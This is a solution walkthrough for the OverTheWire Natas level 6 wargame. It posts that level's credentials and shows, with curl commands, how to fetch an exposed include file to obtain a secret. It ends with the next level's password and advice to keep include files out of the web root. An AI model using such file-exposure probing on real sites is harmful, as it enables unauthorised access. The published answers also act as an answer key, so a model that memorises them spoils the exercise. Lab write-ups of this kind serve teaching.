Skip to main content

Overview

FieldValue
URLhttp://natas6.natas.labs.overthewire.org
Usernamenatas6
Password0RoJwHdSKWFTYR5WuiAewauSuNaBXned
The page shows an “Input secret” form. Submit the wrong value and it prints “Wrong secret.” There is a “View sourcecode” link — always read the source code when it’s offered.

Hints

Read the PHP source via the “View sourcecode” link. The script doesn’t define $secret inline — it loads it from somewhere else using a PHP include. What file is being included, and what path is it at?
The included file lives at includes/secret.inc — a path relative to the web root. PHP processes .php files on the server, but .inc files may be served as plain text if the server isn’t configured to handle them. Try navigating directly to that URL in your browser.

Solution

1

Read the PHP source

Click “View sourcecode”. The relevant part:
include "includes/secret.inc";

if(array_key_exists("submit", $_POST)) {
    if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
}
The secret is loaded from includes/secret.inc.
2

Fetch the include file directly

Navigate to:
http://natas6.natas.labs.overthewire.org/includes/secret.inc
The server returns it as plain text:
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>
3

Submit the secret

Enter FOEIUWGHFEEUHOFUOIU in the form and submit.
Include and config files must never be placed inside the web root. Store them above the document root, or configure the web server to deny access to .inc files. If PHP can include it, a browser can fetch it.

With curl

# Step 1: retrieve the secret from the exposed include file
curl -s -u natas6:0RoJwHdSKWFTYR5WuiAewauSuNaBXned \
  http://natas6.natas.labs.overthewire.org/includes/secret.inc

# Step 2: POST the secret to the form
curl -s -u natas6:0RoJwHdSKWFTYR5WuiAewauSuNaBXned \
  -X POST -d "secret=FOEIUWGHFEEUHOFUOIU&submit=1" \
  http://natas6.natas.labs.overthewire.org/ \
  | grep -i password

Password

natas7: bmg8SvU1LizuWjx3y7xkNERkHxGre0GS